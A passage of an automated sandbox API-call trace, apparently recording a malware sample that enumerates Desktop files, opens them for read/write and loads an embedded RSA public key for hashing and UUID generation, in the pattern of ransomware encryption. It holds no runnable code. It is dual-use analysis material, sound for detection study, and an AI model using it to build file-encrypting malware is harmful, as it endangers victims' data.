[0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0100.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.907] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\") returned="pwaY\\" [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0100.907] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5c08 [0100.908] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0100.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0100.908] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0100.908] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0100.908] PathFindFileNameW (pszPath="") returned="" [0100.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.908] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebd89e40, ftCreationTime.dwHighDateTime=0x1d5bb1f, ftLastAccessTime.dwLowDateTime=0x4130c530, ftLastAccessTime.dwHighDateTime=0x1d5c592, ftLastWriteTime.dwLowDateTime=0x4130c530, ftLastWriteTime.dwHighDateTime=0x1d5c592, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0100.908] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebd89e40, ftCreationTime.dwHighDateTime=0x1d5bb1f, ftLastAccessTime.dwLowDateTime=0x4130c530, ftLastAccessTime.dwHighDateTime=0x1d5c592, ftLastWriteTime.dwLowDateTime=0x4130c530, ftLastWriteTime.dwHighDateTime=0x1d5c592, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.908] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed5b43f0, ftCreationTime.dwHighDateTime=0x1d5c130, ftLastAccessTime.dwLowDateTime=0xb5586bd0, ftLastAccessTime.dwHighDateTime=0x1d5c564, ftLastWriteTime.dwLowDateTime=0xb5586bd0, ftLastWriteTime.dwHighDateTime=0x1d5c564, nFileSizeHigh=0x0, nFileSizeLow=0x855e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="36xpR72G.avi", cAlternateFileName="")) returned 1 [0100.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0100.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\36xpR72G.avi") returned=".avi" [0100.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\36xpR72G.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\36xpr72g.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.908] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=34142) returned 1 [0100.909] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.912] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8538, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.912] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.912] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x855e, lpOverlapped=0x0) returned 1 [0100.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.913] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0100.914] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.914] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.914] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.914] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.914] GetLastError () returned 0x0 [0100.914] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.914] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0100.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.914] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.914] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.914] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8560) returned 0x9ba8d90 [0100.915] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5c08 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ea8 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5c50 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ec0 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ef0 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f08 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.915] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ef0 | out: hHeap=0x630000) returned 1 [0100.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f08 | out: hHeap=0x630000) returned 1 [0100.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f08 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7ef0 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f08 | out: hHeap=0x630000) returned 1 [0100.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ef0 | out: hHeap=0x630000) returned 1 [0100.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.916] GetCurrentThreadId () returned 0x42c [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7978 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.917] GetCurrentThreadId () returned 0x42c [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ef0 [0100.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f08 [0100.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ed8 [0100.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f20 [0100.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.919] HeapFree (in: 